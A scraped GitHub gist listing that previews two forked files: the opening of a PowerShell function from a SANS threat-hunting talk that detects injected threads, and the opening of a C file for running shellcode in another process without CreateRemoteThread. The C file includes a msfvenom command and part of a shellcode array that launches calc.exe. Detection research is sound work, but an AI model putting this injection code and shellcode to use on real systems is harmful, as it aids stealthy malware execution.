⭕Alexander Rymdeko-Harvey killswitch-GUI
killswitch-GUI
/ Get-InjectedThread.ps1
Created
November 11, 2017 18:47
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
killswitch-GUI
/ NotCreateRemoteThread.c
Created
February 26, 2017 21:32
— forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma comment(lib, "Shell32.lib") | |
| #include <windows.h> | |
| #include <shlobj.h> | |
| // msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe | |
| int buf_len = 193; | |
| unsigned char buf[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
| "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" |